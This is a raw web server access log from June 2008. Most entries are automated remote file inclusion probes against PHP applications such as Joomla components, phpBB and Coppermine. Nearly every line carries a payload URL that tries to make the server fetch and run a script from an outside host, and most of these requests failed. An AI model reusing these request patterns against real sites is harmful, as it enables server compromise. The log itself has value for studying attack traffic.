200.105.208.186 - - [15/Jun/2008:19:17:18 -0700] "GET /logs/access_080211.log//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
200.105.208.186 - - [15/Jun/2008:19:17:18 -0700] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
74.53.137.18 - - [15/Jun/2008:19:17:35 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.beschriftungsworld.de/anzeigen/anzeige/1197717838?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
201.12.149.44 - - [15/Jun/2008:19:17:51 -0700] "GET //admin/admin_users.php?phpbb_root_path=http://www.joerg-krug.de/vnc/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
74.53.137.18 - - [15/Jun/2008:19:18:34 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.beschriftungsworld.de/anzeigen/anzeige/1197717838?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
83.102.242.34 - - [15/Jun/2008:19:18:42 -0700] "GET /logs/access_080211.log//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
83.102.242.34 - - [15/Jun/2008:19:18:42 -0700] "GET //plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
83.102.242.34 - - [15/Jun/2008:19:18:43 -0700] "GET /logs//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
74.53.137.18 - - [15/Jun/2008:19:19:18 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.beschriftungsworld.de/anzeigen/anzeige/1197717838?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
74.53.137.18 - - [15/Jun/2008:19:19:24 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.beschriftungsworld.de/anzeigen/anzeige/1197717838?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
202.47.247.136 - - [15/Jun/2008:19:20:37 -0700] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
203.172.184.72 - - [15/Jun/2008:19:20:37 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
203.172.184.72 - - [15/Jun/2008:19:20:37 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:19:20:50 -0700] "GET /logs/access_071217.log//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:19:20:50 -0700] "GET //plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
74.53.137.18 - - [15/Jun/2008:19:20:51 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.beschriftungsworld.de/anzeigen/anzeige/1197717838?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:19:20:51 -0700] "GET /logs//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
74.53.137.18 - - [15/Jun/2008:19:20:59 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.beschriftungsworld.de/anzeigen/anzeige/1197717838?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
200.250.121.2 - - [15/Jun/2008:19:21:20 -0700] "GET //administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
74.55.76.110 - - [15/Jun/2008:19:23:12 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h.b-warez.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
74.55.76.110 - - [15/Jun/2008:19:23:12 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h.b-warez.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
85.214.115.47 - - [15/Jun/2008:19:23:16 -0700] "GET /logs/func.php?CommonAbsDir=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
85.214.115.47 - - [15/Jun/2008:19:23:16 -0700] "GET /func.php?CommonAbsDir=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:19:23:41 -0700] "GET /logs/func.php?CommonAbsDir=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:19:23:41 -0700] "GET /func.php?CommonAbsDir=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
212.9.93.30 - - [15/Jun/2008:19:24:07 -0700] "GET /logs/func.php?CommonAbsDir=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
212.9.93.30 - - [15/Jun/2008:19:24:08 -0700] "GET /func.php?CommonAbsDir=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
212.9.93.30 - - [15/Jun/2008:19:24:09 -0700] "GET /logs/func.php?CommonAbsDir=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
212.9.93.30 - - [15/Jun/2008:19:24:09 -0700] "GET /func.php?CommonAbsDir=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
83.102.242.34 - - [15/Jun/2008:19:24:45 -0700] "GET /logs/access_071217.log//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
83.102.242.34 - - [15/Jun/2008:19:24:45 -0700] "GET //plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
83.102.242.34 - - [15/Jun/2008:19:24:46 -0700] "GET /logs//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
62.43.197.73 - - [15/Jun/2008:19:25:20 -0700] "GET /logs/access_080128.log//include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
80.86.91.115 - - [15/Jun/2008:19:26:27 -0700] "GET /logs/func.php?CommonAbsDir=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
80.86.91.115 - - [15/Jun/2008:19:26:27 -0700] "GET /func.php?CommonAbsDir=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
65.55.211.135 - - [15/Jun/2008:19:28:33 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.neighborhoodglimpses.com"
65.55.211.135 - - [15/Jun/2008:19:28:33 -0700] "GET /logs/ HTTP/1.1" 200 3798 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.neighborhoodglimpses.com"
92.48.68.79 - - [15/Jun/2008:19:29:01 -0700] "GET /logs/access_080414.log//admin.webring.docs.php?component_dir=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
92.48.68.79 - - [15/Jun/2008:19:29:01 -0700] "GET /logs/access_080414.log//admin.webring.docs.php?component_dir=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
92.48.68.79 - - [15/Jun/2008:19:29:02 -0700] "GET //admin.webring.docs.php?component_dir=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
92.48.68.79 - - [15/Jun/2008:19:29:02 -0700] "GET //admin.webring.docs.php?component_dir=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
92.48.68.79 - - [15/Jun/2008:19:29:02 -0700] "GET /logs//admin.webring.docs.php?component_dir=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
92.48.68.79 - - [15/Jun/2008:19:29:02 -0700] "GET /logs//admin.webring.docs.php?component_dir=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
67.195.37.175 - - [15/Jun/2008:19:29:48 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
67.195.37.175 - - [15/Jun/2008:19:30:11 -0700] "GET /?M=D HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
74.53.137.18 - - [15/Jun/2008:19:31:51 -0700] "GET /logs/access_080211.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.beschriftungsworld.de/anzeigen/anzeige/1197717838?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
74.53.137.18 - - [15/Jun/2008:19:31:51 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.beschriftungsworld.de/anzeigen/anzeige/1197717838?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
200.195.11.193 - - [15/Jun/2008:19:33:17 -0700] "GET /logs/access_071224.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
200.195.11.193 - - [15/Jun/2008:19:33:17 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
200.195.11.193 - - [15/Jun/2008:19:33:18 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
74.53.137.18 - - [15/Jun/2008:19:33:20 -0700] "GET /logs/access.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.beschriftungsworld.de/anzeigen/anzeige/1197717838?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
74.53.137.18 - - [15/Jun/2008:19:33:20 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.beschriftungsworld.de/anzeigen/anzeige/1197717838?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
150.165.231.5 - - [15/Jun/2008:19:33:21 -0700] "GET /logs//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
150.165.231.5 - - [15/Jun/2008:19:33:21 -0700] "GET //administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.195.11.193 - - [15/Jun/2008:19:33:45 -0700] "GET /logs/access_071217.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
150.165.231.5 - - [15/Jun/2008:19:34:06 -0700] "GET /index.php?p=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
74.55.76.110 - - [15/Jun/2008:19:34:08 -0700] "GET /logs/access_080211.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://h.b-warez.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
74.55.76.110 - - [15/Jun/2008:19:34:08 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h.b-warez.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
74.55.76.110 - - [15/Jun/2008:19:34:09 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h.b-warez.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
202.221.143.111 - - [15/Jun/2008:19:34:55 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
74.53.137.18 - - [15/Jun/2008:19:35:45 -0700] "GET /logs/access_080211.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.beschriftungsworld.de/anzeigen/anzeige/1197717838?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
74.53.137.18 - - [15/Jun/2008:19:35:45 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.beschriftungsworld.de/anzeigen/anzeige/1197717838?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
74.53.137.18 - - [15/Jun/2008:19:36:03 -0700] "GET /logs/access.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.beschriftungsworld.de/anzeigen/anzeige/1197717838?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
74.53.137.18 - - [15/Jun/2008:19:36:03 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.beschriftungsworld.de/anzeigen/anzeige/1197717838?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:19:39:32 -0700] "GET /logs//index.php?filename=http://www.freewebtown.com/aaahckrj/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:19:39:32 -0700] "GET //index.php?filename=http://www.freewebtown.com/aaahckrj/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.neighborhoodglimpses.com"
74.53.137.18 - - [15/Jun/2008:19:40:48 -0700] "GET /logs/access_080414.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.beschriftungsworld.de/anzeigen/anzeige/1197717838?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
74.53.137.18 - - [15/Jun/2008:19:40:48 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.beschriftungsworld.de/anzeigen/anzeige/1197717838?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
200.250.121.2 - - [15/Jun/2008:19:43:56 -0700] "GET /logs//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.250.121.2 - - [15/Jun/2008:19:43:58 -0700] "GET //administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.195.11.193 - - [15/Jun/2008:19:49:42 -0700] "GET /logs/access.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
200.195.11.193 - - [15/Jun/2008:19:49:42 -0700] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
200.195.11.193 - - [15/Jun/2008:19:49:43 -0700] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
74.0.200.170 - - [15/Jun/2008:19:50:30 -0700] "GET /logs/access.log/Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
74.0.200.170 - - [15/Jun/2008:19:50:31 -0700] "GET /Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
74.0.200.170 - - [15/Jun/2008:19:50:31 -0700] "GET /logs/Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
74.55.76.110 - - [15/Jun/2008:19:51:25 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://h.b-warez.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
217.115.197.49 - - [15/Jun/2008:19:52:25 -0700] "GET /myevent.php?myevent_path=http://www.larisco.com/gbrl.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
217.115.197.49 - - [15/Jun/2008:19:52:25 -0700] "GET /myevent.php?myevent_path=http://www.larisco.com/gbrl.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
217.115.197.48 - - [15/Jun/2008:19:52:37 -0700] "GET /logs/myevent.php?myevent_path=http://kkebi.haansoft.com/~nare/~udplink/tol???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
217.115.197.48 - - [15/Jun/2008:19:52:37 -0700] "GET /myevent.php?myevent_path=http://kkebi.haansoft.com/~nare/~udplink/tol???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
65.98.70.18 - - [15/Jun/2008:19:53:23 -0700] "GET /logs//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
65.98.70.18 - - [15/Jun/2008:19:53:23 -0700] "GET //%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
58.226.23.119 - - [15/Jun/2008:19:53:59 -0700] "GET /logs/access_071217.log//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
58.226.23.119 - - [15/Jun/2008:19:53:59 -0700] "GET //plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
58.226.23.119 - - [15/Jun/2008:19:54:00 -0700] "GET /logs//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
217.115.197.49 - - [15/Jun/2008:19:54:00 -0700] "GET /myevent.php?myevent_path=http://www.larisco.com/gbrl.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
85.214.28.45 - - [15/Jun/2008:19:54:44 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.neighborhoodglimpses.com"
85.214.28.45 - - [15/Jun/2008:19:54:45 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.neighborhoodglimpses.com"
200.181.217.196 - - [15/Jun/2008:19:54:53 -0700] "GET /logs/access_080414.log/main.php?x=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.181.217.196 - - [15/Jun/2008:19:54:54 -0700] "GET /main.php?x=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.181.217.196 - - [15/Jun/2008:19:54:55 -0700] "GET /logs/main.php?x=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
67.192.77.38 - - [15/Jun/2008:19:55:12 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.lubricarca.com/portal/modules/Forums/admin/tx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
67.192.77.38 - - [15/Jun/2008:19:55:12 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.lubricarca.com/portal/modules/Forums/admin/tx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
67.192.77.38 - - [15/Jun/2008:19:55:12 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.lubricarca.com/portal/modules/Forums/admin/tx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
67.192.77.38 - - [15/Jun/2008:19:55:12 -0700] "GET /logs/access_071217.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.lubricarca.com/portal/modules/Forums/admin/tx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
208.82.112.83 - - [15/Jun/2008:19:55:35 -0700] "GET /logs/access_080211.log///////////?mosConfig_absolute_path=http://swzx.jlu.edu.cn/test/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
208.82.112.83 - - [15/Jun/2008:19:55:35 -0700] "GET ///////////?mosConfig_absolute_path=http://swzx.jlu.edu.cn/test/media/wy.txt?? HTTP/1.1" 200 788 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
208.82.112.83 - - [15/Jun/2008:19:55:35 -0700] "GET /logs///////////?mosConfig_absolute_path=http://swzx.jlu.edu.cn/test/media/wy.txt?? HTTP/1.1" 200 3812 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
64.13.251.55 - - [15/Jun/2008:19:55:40 -0700] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.lubricarca.com/portal/modules/Forums/admin/tx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
64.13.251.55 - - [15/Jun/2008:19:55:40 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.lubricarca.com/portal/modules/Forums/admin/tx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
64.13.251.55 - - [15/Jun/2008:19:55:41 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.lubricarca.com/portal/modules/Forums/admin/tx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
202.221.143.111 - - [15/Jun/2008:19:56:19 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
202.221.143.111 - - [15/Jun/2008:19:56:20 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
203.57.68.22 - - [15/Jun/2008:19:56:42 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
